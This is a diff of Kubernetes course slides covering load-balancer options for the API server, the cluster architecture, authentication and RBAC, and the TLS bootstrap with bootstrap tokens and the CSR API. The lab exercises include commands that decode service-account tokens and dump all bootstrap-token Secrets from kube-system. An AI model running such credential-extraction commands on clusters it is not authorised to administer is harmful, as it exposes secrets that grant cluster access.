## Option 2: local load balancer
|
||||
|
||||
- Set up a load balancer (like NGINX, HAProxy...) on *each* node
|
||||
|
||||
- Configure that load balancer to send traffic to the API server node(s)
|
||||
|
||||
- Point kubelet (and other components) to `localhost`
|
||||
|
||||
- Update the load balancer configuration when API server nodes are updated
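A minimal sketch of such a local load balancer, using HAProxy (the API server addresses are made up):

```bash
cat <<'EOF' | sudo tee /etc/haproxy/haproxy.cfg
defaults
    mode tcp
    timeout connect 5s
    timeout client  30s
    timeout server  30s

frontend k8s_api
    bind 127.0.0.1:6443
    default_backend k8s_api_servers

backend k8s_api_servers
    server api1 10.0.0.11:6443 check
    server api2 10.0.0.12:6443 check
EOF
sudo systemctl reload haproxy
```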
|
||||
|
||||
---
|
||||
|
||||
## Updating the local load balancer config
|
||||
|
||||
- Distribute the updated configuration (push)
|
||||
|
||||
- Or regularly check for updates (pull)
|
||||
|
||||
- The latter requires an external, highly available store
|
||||
|
||||
(it could be an object store, an HTTP server, or even DNS...)
|
||||
|
||||
- Updates can be facilitated by a DaemonSet
|
||||
|
||||
(but remember that it can't be used when installing a new node!)
|
||||
|
||||
---
|
||||
|
||||
## Option 3: DNS records
|
||||
|
||||
- Put all the API server nodes behind a round-robin DNS
|
||||
|
||||
- Point kubelet (and other components) to that name
|
||||
|
||||
- Update the records when needed
|
||||
|
||||
- Note: this option is not officially supported
|
||||
|
||||
(but since kubelet supports reconnection anyway, it *should* work)
|
||||
|
||||
---
|
||||
|
||||
## Option 4: ....................
|
||||
|
||||
- Many managed clusters expose a high-availability API endpoint
|
||||
|
||||
(and you don't have to worry about it)
|
||||
|
||||
- You can also use HA mechanisms that you're familiar with
|
||||
|
||||
(e.g. virtual IPs)
|
||||
|
||||
- Tunnels are also fine
|
||||
|
||||
(e.g. [k3s](https://k3s.io/) uses a tunnel to allow each node to contact the API server)
|
||||
383
slides/k8s/architecture.md
Normal file
@@ -0,0 +1,383 @@
|
||||
# Kubernetes architecture
|
||||
|
||||
We can arbitrarily split Kubernetes in two parts:
|
||||
|
||||
- the *nodes*, a set of machines that run our containerized workloads;
|
||||
|
||||
- the *control plane*, a set of processes implementing the Kubernetes APIs.
|
||||
|
||||
Kubernetes also relies on underlying infrastructure:
|
||||
|
||||
- servers, network connectivity (obviously!),
|
||||
|
||||
- optional components like storage systems, load balancers ...
|
||||
|
||||
---
|
||||
|
||||
## Control plane location
|
||||
|
||||
The control plane can run:
|
||||
|
||||
- in containers, on the same nodes that run other application workloads
|
||||
|
||||
(example: Minikube; 1 node runs everything)
|
||||
|
||||
- on a dedicated node
|
||||
|
||||
(example: a cluster installed with kubeadm)
|
||||
|
||||
- on a dedicated set of nodes
|
||||
|
||||
(example: Kubernetes The Hard Way; kops)
|
||||
|
||||
- outside of the cluster
|
||||
|
||||
(example: most managed clusters like AKS, EKS, GKE)
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## What runs on a node
|
||||
|
||||
- Our containerized workloads
|
||||
|
||||
- A container engine like Docker, CRI-O, containerd...
|
||||
|
||||
(in theory, the choice doesn't matter, as the engine is abstracted by Kubernetes)
|
||||
|
||||
- kubelet: an agent connecting the node to the cluster
|
||||
|
||||
(it connects to the API server, registers the node, receives instructions)
|
||||
|
||||
- kube-proxy: a component used for internal cluster communication
|
||||
|
||||
(note that this is *not* an overlay network or a CNI plugin!)
|
||||
|
||||
---
|
||||
|
||||
## What's in the control plane
|
||||
|
||||
- Everything is stored in etcd
|
||||
|
||||
(it's the only stateful component)
|
||||
|
||||
- Everyone communicates exclusively through the API server:
|
||||
|
||||
- we (users) interact with the cluster through the API server
|
||||
|
||||
- the nodes register and get their instructions through the API server
|
||||
|
||||
- the other control plane components also register with the API server
|
||||
|
||||
- API server is the only component that reads/writes from/to etcd
|
||||
|
||||
---
|
||||
|
||||
## Communication protocols: API server
|
||||
|
||||
- The API server exposes a REST API
|
||||
|
||||
(except for some calls, e.g. to attach interactively to a container)
|
||||
|
||||
- Almost all requests and responses are JSON following a strict format
|
||||
|
||||
- For performance, the requests and responses can also be done over protobuf
|
||||
|
||||
(see this [design proposal](https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md) for details)
|
||||
|
||||
- In practice, protobuf is used for all internal communication
|
||||
|
||||
(between control plane components, and with kubelet)
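We can poke at that REST API directly through `kubectl` (a quick sketch):

```bash
# GET /api/v1/namespaces, then extract the names with jq
kubectl get --raw /api/v1/namespaces | jq -r '.items[].metadata.name'
```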
|
||||
|
||||
---
|
||||
|
||||
## Communication protocols: on the nodes
|
||||
|
||||
The kubelet agent uses a number of special-purpose protocols and interfaces, including:
|
||||
|
||||
- CRI (Container Runtime Interface)
|
||||
|
||||
- used for communication with the container engine
|
||||
- abstracts the differences between container engines
|
||||
- based on gRPC+protobuf
|
||||
|
||||
- [CNI (Container Network Interface)](https://github.com/containernetworking/cni/blob/master/SPEC.md)
|
||||
|
||||
- used for communication with network plugins
|
||||
- network plugins are implemented as executable programs invoked by kubelet
|
||||
- network plugins provide IPAM
|
||||
- network plugins set up network interfaces in pods
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
# The Kubernetes API
|
||||
|
||||
[
|
||||
*The Kubernetes API server is a "dumb server" which offers storage, versioning, validation, update, and watch semantics on API resources.*
|
||||
](
|
||||
https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md#proposal-and-motivation
|
||||
)
|
||||
|
||||
([Clayton Coleman](https://twitter.com/smarterclayton), Kubernetes Architect and Maintainer)
|
||||
|
||||
What does that mean?
|
||||
|
||||
---
|
||||
|
||||
## The Kubernetes API is declarative
|
||||
|
||||
- We cannot tell the API, "run a pod"
|
||||
|
||||
- We can tell the API, "here is the definition for pod X"
|
||||
|
||||
- The API server will store that definition (in etcd)
|
||||
|
||||
- *Controllers* will then wake up and create a pod matching the definition
|
||||
|
||||
---
|
||||
|
||||
## The core features of the Kubernetes API
|
||||
|
||||
- We can create, read, update, and delete objects
|
||||
|
||||
- We can also *watch* objects
|
||||
|
||||
(be notified when an object changes, or when an object of a given type is created)
|
||||
|
||||
- Objects are strongly typed
|
||||
|
||||
- Types are *validated* and *versioned*
|
||||
|
||||
- Storage and watch operations are provided by etcd
|
||||
|
||||
(note: the [k3s](https://k3s.io/) project allows us to use sqlite instead of etcd)
|
||||
|
||||
---
|
||||
|
||||
## Let's experiment a bit!
|
||||
|
||||
- For the exercises in this section, connect to the first node of the `test` cluster
|
||||
|
||||
.exercise[
|
||||
|
||||
- SSH to the first node of the test cluster
|
||||
|
||||
- Check that the cluster is operational:
|
||||
```bash
|
||||
kubectl get nodes
|
||||
```
|
||||
|
||||
- All nodes should be `Ready`
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Create
|
||||
|
||||
- Let's create a simple object
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a namespace with the following command:
|
||||
```bash
|
||||
kubectl create -f- <<EOF
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: hello
|
||||
EOF
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
This is equivalent to `kubectl create namespace hello`.
|
||||
|
||||
---
|
||||
|
||||
## Read
|
||||
|
||||
- Let's retrieve the object we just created
|
||||
|
||||
.exercise[
|
||||
|
||||
- Read back our object:
|
||||
```bash
|
||||
kubectl get namespace hello -o yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We see a lot of data that wasn't here when we created the object.
|
||||
|
||||
Some data was automatically added to the object (like `spec.finalizers`).
|
||||
|
||||
Some data is dynamic (typically, the content of `status`.)
|
||||
|
||||
---
|
||||
|
||||
## API requests and responses
|
||||
|
||||
- Almost every Kubernetes API payload (requests and responses) has the same format:
|
||||
```yaml
|
||||
apiVersion: xxx
|
||||
kind: yyy
|
||||
metadata:
|
||||
name: zzz
|
||||
(more metadata fields here)
|
||||
(more fields here)
|
||||
```
|
||||
|
||||
- The fields shown above are mandatory, except for some special cases
|
||||
|
||||
(e.g.: in lists of resources, the list itself doesn't have a `metadata.name`)
|
||||
|
||||
- We show YAML for convenience, but the API uses JSON
|
||||
|
||||
(with optional protobuf encoding)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## API versions
|
||||
|
||||
- The `apiVersion` field corresponds to an *API group*
|
||||
|
||||
- It can be either `v1` (aka "core" group or "legacy group"), or `group/version`; e.g.:
|
||||
|
||||
- `apps/v1`
|
||||
- `rbac.authorization.k8s.io/v1`
|
||||
- `extensions/v1beta1`
|
||||
|
||||
- It does not indicate which version of Kubernetes we're talking about
|
||||
|
||||
- It *indirectly* indicates the version of the `kind`
|
||||
|
||||
(which fields exist, their format, which ones are mandatory...)
|
||||
|
||||
- A single resource type (`kind`) is rarely versioned alone
|
||||
|
||||
(e.g.: the `batch` API group contains `jobs` and `cronjobs`)
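We can list the groups and versions served by our cluster (a quick sketch):

```bash
kubectl api-versions                      # all group/version pairs
kubectl api-resources --api-group=batch   # the kinds in the batch group
```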
|
||||
|
||||
---
|
||||
|
||||
## Update
|
||||
|
||||
- Let's update our namespace object
|
||||
|
||||
- There are many ways to do that, including:
|
||||
|
||||
- `kubectl apply` (and provide an updated YAML file)
|
||||
- `kubectl edit`
|
||||
- `kubectl patch`
|
||||
- many helpers, like `kubectl label`, or `kubectl set`
|
||||
|
||||
- In each case, `kubectl` will:
|
||||
|
||||
- get the current definition of the object
|
||||
- compute changes
|
||||
- submit the changes (with `PATCH` requests)
|
||||
|
||||
---
|
||||
|
||||
## Adding a label
|
||||
|
||||
- For demonstration purposes, let's add a label to the namespace
|
||||
|
||||
- The easiest way is to use `kubectl label`
|
||||
|
||||
.exercise[
|
||||
|
||||
- In one terminal, watch namespaces:
|
||||
```bash
|
||||
kubectl get namespaces --show-labels -w
|
||||
```
|
||||
|
||||
- In the other, update our namespace:
|
||||
```bash
|
||||
kubectl label namespaces hello color=purple
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We demonstrated *update* and *watch* semantics.
|
||||
|
||||
---
|
||||
|
||||
## What's special about *watch*?
|
||||
|
||||
- The API server itself doesn't do anything: it's just a fancy object store
|
||||
|
||||
- All the actual logic in Kubernetes is implemented with *controllers*
|
||||
|
||||
- A *controller* watches a set of resources, and takes action when they change
|
||||
|
||||
- Examples:
|
||||
|
||||
- when a Pod object is created, it gets scheduled and started
|
||||
|
||||
- when a Pod belonging to a ReplicaSet terminates, it gets replaced
|
||||
|
||||
- when a Deployment object is updated, it can trigger a rolling update
|
||||
|
||||
---
|
||||
|
||||
# Other control plane components
|
||||
|
||||
- API server ✔️
|
||||
|
||||
- etcd ✔️
|
||||
|
||||
- Controller manager
|
||||
|
||||
- Scheduler
|
||||
|
||||
---
|
||||
|
||||
## Controller manager
|
||||
|
||||
- This is a collection of loops watching all kinds of objects
|
||||
|
||||
- That's where the actual logic of Kubernetes lives
|
||||
|
||||
- When we create a Deployment (e.g. with `kubectl run web --image=nginx`),
|
||||
|
||||
- we create a Deployment object
|
||||
|
||||
- the Deployment controller notices it, and creates a ReplicaSet
|
||||
|
||||
- the ReplicaSet controller notices the ReplicaSet, and creates a Pod
|
||||
|
||||
---
|
||||
|
||||
## Scheduler
|
||||
|
||||
- When a pod is created, it is in `Pending` state
|
||||
|
||||
- The scheduler (or rather: *a scheduler*) must bind it to a node
|
||||
|
||||
- Kubernetes comes with an efficient scheduler with many features
|
||||
|
||||
- if we have special requirements, we can add another scheduler
|
||||
<br/>
|
||||
(example: this [demo scheduler](https://github.com/kelseyhightower/scheduler) uses the cost of nodes, stored in node annotations)
|
||||
|
||||
- A pod might stay in `Pending` state for a long time:
|
||||
|
||||
- if the cluster is full
|
||||
|
||||
- if the pod has special constraints that can't be met
|
||||
|
||||
- if the scheduler is not running (!)
|
||||
@@ -22,7 +22,7 @@
|
||||
|
||||
- When the API server receives a request, it tries to authenticate it
|
||||
|
||||
(it examines headers, certificates ... anything available)
|
||||
(it examines headers, certificates... anything available)
|
||||
|
||||
- Many authentication methods are available and can be used simultaneously
|
||||
|
||||
@@ -34,7 +34,7 @@
|
||||
- the user ID
|
||||
- a list of groups
|
||||
|
||||
- The API server doesn't interpret these; it'll be the job of *authorizers*
|
||||
- The API server doesn't interpret these; that'll be the job of *authorizers*
|
||||
|
||||
---
|
||||
|
||||
@@ -50,7 +50,7 @@
|
||||
|
||||
- [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication)
|
||||
|
||||
(carrying user and password in a HTTP header)
|
||||
(carrying user and password in an HTTP header)
|
||||
|
||||
- Authentication proxy
|
||||
|
||||
@@ -64,7 +64,7 @@
|
||||
|
||||
(`401 Unauthorized` HTTP code)
|
||||
|
||||
- If a request is neither accepted nor accepted by anyone, it's anonymous
|
||||
- If a request is neither rejected nor accepted by anyone, it's anonymous
|
||||
|
||||
- the user name is `system:anonymous`
|
||||
|
||||
@@ -88,7 +88,7 @@
|
||||
|
||||
(i.e. they are not stored in etcd or anywhere else)
|
||||
|
||||
- Users can be created (and given membership to groups) independently of the API
|
||||
- Users can be created (and added to groups) independently of the API
|
||||
|
||||
- The Kubernetes API can be set up to use your custom CA to validate client certs
|
||||
|
||||
@@ -108,7 +108,7 @@ class: extra-details
|
||||
--raw \
|
||||
-o json \
|
||||
| jq -r .users[0].user[\"client-certificate-data\"] \
|
||||
| base64 -d \
|
||||
| openssl base64 -d -A \
|
||||
| openssl x509 -text \
|
||||
| grep Subject:
|
||||
```
|
||||
@@ -127,7 +127,7 @@ class: extra-details
|
||||
- `--raw` includes certificate information (which shows as REDACTED otherwise)
|
||||
- `-o json` outputs the information in JSON format
|
||||
- `| jq ...` extracts the field with the user certificate (in base64)
|
||||
- `| base64 -d` decodes the base64 format (now we have a PEM file)
|
||||
- `| openssl base64 -d -A` decodes the base64 format (now we have a PEM file)
|
||||
- `| openssl x509 -text` parses the certificate and outputs it as plain text
|
||||
- `| grep Subject:` shows us the line that interests us
|
||||
|
||||
@@ -143,19 +143,21 @@ class: extra-details
|
||||
|
||||
(see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))
|
||||
|
||||
- As a result, we cannot easily suspend a user's access
|
||||
- As a result, we don't have an easy way to terminate someone's access
|
||||
|
||||
- There are workarounds, but they are very inconvenient:
|
||||
(if their key is compromised, or they leave the organization)
|
||||
|
||||
- issue short-lived certificates (e.g. 24 hours) and regenerate them often
|
||||
- Option 1: re-create a new CA and re-issue everyone's certificates
|
||||
<br/>
|
||||
→ Maybe OK if we only have a few users; no way otherwise
|
||||
|
||||
- re-create the CA and re-issue all certificates in case of compromise
|
||||
- Option 2: don't use groups; grant permissions to individual users
|
||||
<br/>
|
||||
→ Inconvenient if we have many users and teams; error-prone
|
||||
|
||||
- grant permissions to individual users, not groups
|
||||
<br/>
|
||||
(and remove all permissions to a compromised user)
|
||||
|
||||
- Until this is fixed, we probably want to use other methods
|
||||
- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
|
||||
<br/>
|
||||
→ This can be facilitated by e.g. Vault or by the Kubernetes CSR API
|
||||
|
||||
---
|
||||
|
||||
@@ -191,7 +193,7 @@ class: extra-details
|
||||
|
||||
(the kind that you can view with `kubectl get secrets`)
|
||||
|
||||
- Service accounts are generally used to grant permissions to applications, services ...
|
||||
- Service accounts are generally used to grant permissions to applications, services...
|
||||
|
||||
(as opposed to humans)
|
||||
|
||||
@@ -215,7 +217,7 @@ class: extra-details
|
||||
|
||||
.exercise[
|
||||
|
||||
- The resource name is `serviceaccount` or `sa` in short:
|
||||
- The resource name is `serviceaccount` or `sa` for short:
|
||||
```bash
|
||||
kubectl get sa
|
||||
```
|
||||
@@ -260,7 +262,7 @@ class: extra-details
|
||||
- Extract the token and decode it:
|
||||
```bash
|
||||
TOKEN=$(kubectl get secret $SECRET -o json \
|
||||
| jq -r .data.token | base64 -d)
|
||||
| jq -r .data.token | openssl base64 -d -A)
|
||||
```
|
||||
|
||||
]
|
||||
@@ -307,7 +309,7 @@ class: extra-details
|
||||
|
||||
- The API "sees" us as a different user
|
||||
|
||||
- But neither user has any right, so we can't do nothin'
|
||||
- But neither user has any rights, so we can't do nothin'
|
||||
|
||||
- Let's change that!
|
||||
|
||||
@@ -337,9 +339,9 @@ class: extra-details
|
||||
|
||||
- A rule is a combination of:
|
||||
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete ...
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete...
|
||||
|
||||
- resources (as in "API resource", like pods, nodes, services ...)
|
||||
- resources (as in "API resource," like pods, nodes, services...)
|
||||
|
||||
- resource names (to specify e.g. one specific pod instead of all pods)
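Putting these together, a Role could look like this (a sketch; `pod-reader` is a hypothetical name):

```bash
kubectl apply -f- <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-reader
  namespace: default
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]
EOF
```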
|
||||
|
||||
@@ -373,13 +375,13 @@ class: extra-details
|
||||
|
||||
- We can also define API resources ClusterRole and ClusterRoleBinding
|
||||
|
||||
- These are a superset, allowing to:
|
||||
- These are a superset, allowing us to:
|
||||
|
||||
- specify actions on cluster-wide objects (like nodes)
|
||||
|
||||
- operate across all namespaces
|
||||
|
||||
- We can create Role and RoleBinding resources within a namespaces
|
||||
- We can create Role and RoleBinding resources within a namespace
|
||||
|
||||
- ClusterRole and ClusterRoleBinding resources are global
|
||||
|
||||
@@ -387,13 +389,13 @@ class: extra-details
|
||||
|
||||
## Pods and service accounts
|
||||
|
||||
- A pod can be associated to a service account
|
||||
- A pod can be associated with a service account
|
||||
|
||||
- by default, it is associated to the `default` service account
|
||||
- by default, it is associated with the `default` service account
|
||||
|
||||
- as we've seen earlier, this service account has no permission anyway
|
||||
- as we saw earlier, this service account has no permissions anyway
|
||||
|
||||
- The associated token is exposed into the pod's filesystem
|
||||
- The associated token is exposed to the pod's filesystem
|
||||
|
||||
(in `/var/run/secrets/kubernetes.io/serviceaccount/token`)
|
||||
|
||||
@@ -407,7 +409,7 @@ class: extra-details
|
||||
|
||||
- We are going to create a service account
|
||||
|
||||
- We will use an existing cluster role (`view`)
|
||||
- We will use a default cluster role (`view`)
|
||||
|
||||
- We will bind together this role and this service account
|
||||
|
||||
@@ -458,7 +460,7 @@ class: extra-details
|
||||
|
||||
]
|
||||
|
||||
It's important to note a couple of details in these flags ...
|
||||
It's important to note a couple of details in these flags...
|
||||
|
||||
---
|
||||
|
||||
@@ -491,13 +493,13 @@ It's important to note a couple of details in these flags ...
|
||||
|
||||
- again, the command would have worked fine (no error)
|
||||
|
||||
- ... but our API requests would have been denied later
|
||||
- ...but our API requests would have been denied later
|
||||
|
||||
- What about the `default:` prefix?
|
||||
|
||||
- that's the namespace of the service account
|
||||
|
||||
- yes, it could be inferred from context, but ... `kubectl` requires it
|
||||
- yes, it could be inferred from context, but... `kubectl` requires it
|
||||
|
||||
---
|
||||
|
||||
@@ -574,6 +576,51 @@ It's important to note a couple of details in these flags ...
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where does this `view` role come from?
|
||||
|
||||
- Kubernetes defines a number of ClusterRoles intended to be bound to users
|
||||
|
||||
- `cluster-admin` can do *everything* (think `root` on UNIX)
|
||||
|
||||
- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)
|
||||
|
||||
- `edit` is similar to `admin`, but cannot view or edit permissions
|
||||
|
||||
- `view` has read-only access to most resources, except permissions and secrets
|
||||
|
||||
*In many situations, these roles will be all you need.*
|
||||
|
||||
*You can also customize them!*
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Customizing the default roles
|
||||
|
||||
- If you need to *add* permissions to these default roles (or others),
|
||||
<br/>
|
||||
you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism
|
||||
|
||||
- This happens by creating a ClusterRole with the following labels:
|
||||
```yaml
|
||||
metadata:
|
||||
labels:
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
```
|
||||
|
||||
- This ClusterRole's permissions will be added to `admin`/`edit`/`view`, respectively
|
||||
|
||||
- This is particularly useful when using CustomResourceDefinitions
|
||||
|
||||
(since Kubernetes cannot guess which resources are sensitive and which ones aren't)
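For example, to let `view` users see a hypothetical `widgets` custom resource (a sketch; the `example.com` group and all names are made up):

```bash
kubectl apply -f- <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: view-widgets
  labels:
    rbac.authorization.k8s.io/aggregate-to-view: "true"
rules:
- apiGroups: ["example.com"]
  resources: ["widgets"]
  verbs: ["get", "list", "watch"]
EOF
```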
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where do our permissions come from?
|
||||
|
||||
- When interacting with the Kubernetes API, we are using a client certificate
|
||||
@@ -605,9 +652,32 @@ class: extra-details
|
||||
kubectl describe clusterrolebinding cluster-admin
|
||||
```
|
||||
|
||||
- This binding associates `system:masters` to the cluster role `cluster-admin`
|
||||
- This binding associates `system:masters` with the cluster role `cluster-admin`
|
||||
|
||||
- And the `cluster-admin` is, basically, `root`:
|
||||
```bash
|
||||
kubectl describe clusterrole cluster-admin
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Figuring out who can do what
|
||||
|
||||
- For auditing purposes, sometimes we want to know who can perform an action
|
||||
|
||||
- There is a proof-of-concept tool by Aqua Security which does exactly that:
|
||||
|
||||
https://github.com/aquasecurity/kubectl-who-can
|
||||
|
||||
- This is one way to install it:
|
||||
```bash
|
||||
docker run --rm -v /usr/local/bin:/go/bin golang \
|
||||
go get -v github.com/aquasecurity/kubectl-who-can
|
||||
```
|
||||
|
||||
- This is one way to use it:
|
||||
```bash
|
||||
kubectl-who-can create pods
|
||||
```
|
||||
|
||||
259
slides/k8s/bootstrap.md
Normal file
@@ -0,0 +1,259 @@
|
||||
# TLS bootstrap
|
||||
|
||||
- kubelet needs TLS keys and certificates to communicate with the control plane
|
||||
|
||||
- How do we generate this information?
|
||||
|
||||
- How do we make it available to kubelet?
|
||||
|
||||
---
|
||||
|
||||
## Option 1: push
|
||||
|
||||
- When we want to provision a node:
|
||||
|
||||
- generate its keys, certificate, and sign centrally
|
||||
|
||||
- push the files to the node
|
||||
|
||||
- OK for "traditional", on-premises deployments
|
||||
|
||||
- Not OK for cloud deployments with auto-scaling
|
||||
|
||||
---
|
||||
|
||||
## Option 2: poll + push
|
||||
|
||||
- Discover nodes when they are created
|
||||
|
||||
(e.g. with cloud API)
|
||||
|
||||
- When we detect a new node, push TLS material to the node
|
||||
|
||||
(like in option 1)
|
||||
|
||||
- It works, but:
|
||||
|
||||
- discovery code is specific to each provider
|
||||
|
||||
- relies heavily on the cloud provider API
|
||||
|
||||
- doesn't work on-premises
|
||||
|
||||
- doesn't scale
|
||||
|
||||
---
|
||||
|
||||
## Option 3: bootstrap tokens + CSR API
|
||||
|
||||
- Since Kubernetes 1.4, the Kubernetes API supports CSR
|
||||
|
||||
(Certificate Signing Requests)
|
||||
|
||||
- This is similar to the protocol used to obtain e.g. HTTPS certificates:
|
||||
|
||||
- subject (here, kubelet) generates TLS keys and CSR
|
||||
|
||||
- subject submits CSR to CA
|
||||
|
||||
- CA validates (or not) the CSR
|
||||
|
||||
- CA sends back signed certificate to subject
|
||||
|
||||
- This is combined with *bootstrap tokens*
|
||||
|
||||
---
|
||||
|
||||
## Bootstrap tokens
|
||||
|
||||
- A [bootstrap token](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/) is an API access token
|
||||
|
||||
- it is a Secret with type `bootstrap.kubernetes.io/token`
|
||||
|
||||
- it is 6 public characters (ID) + 16 secret characters
|
||||
<br/>(example: `whd3pq.d1ushuf6ccisjacu`)
|
||||
|
||||
- it gives access to groups `system:bootstrap:<ID>` and `system:bootstrappers`
|
||||
|
||||
- additional groups can be specified in the Secret
|
||||
|
||||
---
|
||||
|
||||
## Bootstrap tokens with kubeadm
|
||||
|
||||
- kubeadm automatically creates a bootstrap token
|
||||
|
||||
(it is shown at the end of `kubeadm init`)
|
||||
|
||||
- That token adds the group `system:bootstrappers:kubeadm:default-node-token`
|
||||
|
||||
- kubeadm also creates a ClusterRoleBinding `kubeadm:kubelet-bootstrap`
|
||||
<br/>binding `...:default-node-token` to ClusterRole `system:node-bootstrapper`
|
||||
|
||||
- That ClusterRole gives create/get/list/watch permissions on the CSR API
|
||||
|
||||
---
|
||||
|
||||
## Bootstrap tokens in practice
|
||||
|
||||
- Let's list our bootstrap tokens on a cluster created with kubeadm
|
||||
|
||||
.exercise[
|
||||
|
||||
- Log into node `test1`
|
||||
|
||||
- View bootstrap tokens:
|
||||
```bash
|
||||
sudo kubeadm token list
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- Tokens are short-lived
|
||||
|
||||
- We can create new tokens with `kubeadm` if necessary
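For example (a sketch; both flags are standard `kubeadm token create` options):

```bash
# Create a short-lived token and print the matching "kubeadm join" command
sudo kubeadm token create --ttl 1h --print-join-command
```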
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Retrieving bootstrap tokens with kubectl
|
||||
|
||||
- Bootstrap tokens are Secrets with type `bootstrap.kubernetes.io/token`
|
||||
|
||||
- Token ID and secret are in data fields `token-id` and `token-secret`
|
||||
|
||||
- In Secrets, data fields are encoded with Base64
|
||||
|
||||
- This "very simple" command will show us the tokens:
|
||||
|
||||
```
|
||||
kubectl -n kube-system get secrets -o json |
|
||||
jq -r '.items[]
|
||||
| select(.type=="bootstrap.kubernetes.io/token")
|
||||
| ( .data["token-id"] + "Lg==" + .data["token-secret"] + "Cg==")
|
||||
' | base64 -d
|
||||
```
|
||||
|
||||
(On recent versions of `jq`, you can simplify by using filter `@base64d`.)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Using a bootstrap token
|
||||
|
||||
- The token we need to use has the form `abcdef.1234567890abcdef`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that it is accepted by the API server:
|
||||
```bash
|
||||
curl -k -H "Authorization: Bearer abcdef.1234567890abcdef"
|
||||
```
|
||||
|
||||
- We should see that we are *authenticated* but not *authorized*:
|
||||
```
|
||||
User \"system:bootstrap:abcdef\" cannot get path \"/\""
|
||||
```
|
||||
|
||||
- Check that we can access the CSR API:
|
||||
```bash
|
||||
curl -k -H "Authorization: Bearer abcdef.1234567890abcdef" \
|
||||
https://10.96.0.1/apis/certificates.k8s.io/v1beta1/certificatesigningrequests
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## The cluster-info ConfigMap
|
||||
|
||||
- Before we can talk to the API, we need:
|
||||
|
||||
- the API server address (obviously!)
|
||||
|
||||
- the cluster CA certificate
|
||||
|
||||
- That information is stored in a public ConfigMap
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve that ConfigMap:
|
||||
```bash
|
||||
curl -k https://10.96.0.1/api/v1/namespaces/kube-public/configmaps/cluster-info
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
*Extracting the kubeconfig file is left as an exercise for the reader.*
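(One possible solution, shown as a sketch using `jq`:)

```bash
curl -sk https://10.96.0.1/api/v1/namespaces/kube-public/configmaps/cluster-info \
  | jq -r '.data.kubeconfig' > bootstrap.kubeconfig
```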
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Signature of the config-map
|
||||
|
||||
- You might have noticed a few `jws-kubeconfig-...` fields
|
||||
|
||||
- These are config-map signatures
|
||||
|
||||
(so that the client can protect against MITM attacks)
|
||||
|
||||
- These are JWS signatures using HMAC-SHA256
|
||||
|
||||
(see [here](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/#configmap-signing) for more details)
|
||||
|
||||
---
|
||||
|
||||
## Putting it all together
|
||||
|
||||
This is the TLS bootstrap mechanism, step by step.
|
||||
|
||||
- The node uses the cluster-info ConfigMap to get the cluster CA certificate
|
||||
|
||||
- The node generates its keys and CSR
|
||||
|
||||
- Using the bootstrap token, the node creates a CertificateSigningRequest object
|
||||
|
||||
- The node watches the CSR object
|
||||
|
||||
- The CSR object is accepted (automatically or by an admin; see the sketch below)
|
||||
|
||||
- The node gets notified, and retrieves the certificate
|
||||
|
||||
- The node can now join the cluster
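When auto-approval is disabled, the admin side of that workflow looks like this (a sketch; the CSR name varies):

```bash
kubectl get csr                        # list pending CertificateSigningRequests
kubectl certificate approve csr-xxxxx  # approve one (the name is hypothetical)
```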
|
||||
|
||||
---
|
||||
|
||||
## Bottom line
|
||||
|
||||
- If you paid attention, we still need a way to:
|
||||
|
||||
- either safely get the bootstrap token to the nodes
|
||||
|
||||
- or disable auto-approval and manually approve the nodes when they join
|
||||
|
||||
- The goal of the TLS bootstrap mechanism is *not* to solve this
|
||||
|
||||
(in terms of information theory, it's fundamentally impossible!)
|
||||
|
||||
- But it reduces the differences between environments, infrastructures, providers ...
|
||||
|
||||
- It gives a mechanism that is easier to use, and flexible enough, for most scenarios
|
||||
|
||||
---
|
||||
|
||||
## More information
|
||||
|
||||
- As always, the Kubernetes documentation has extra details:
|
||||
|
||||
- [TLS management](https://kubernetes.io/docs/tasks/tls/managing-tls-in-a-cluster/)
|
||||
|
||||
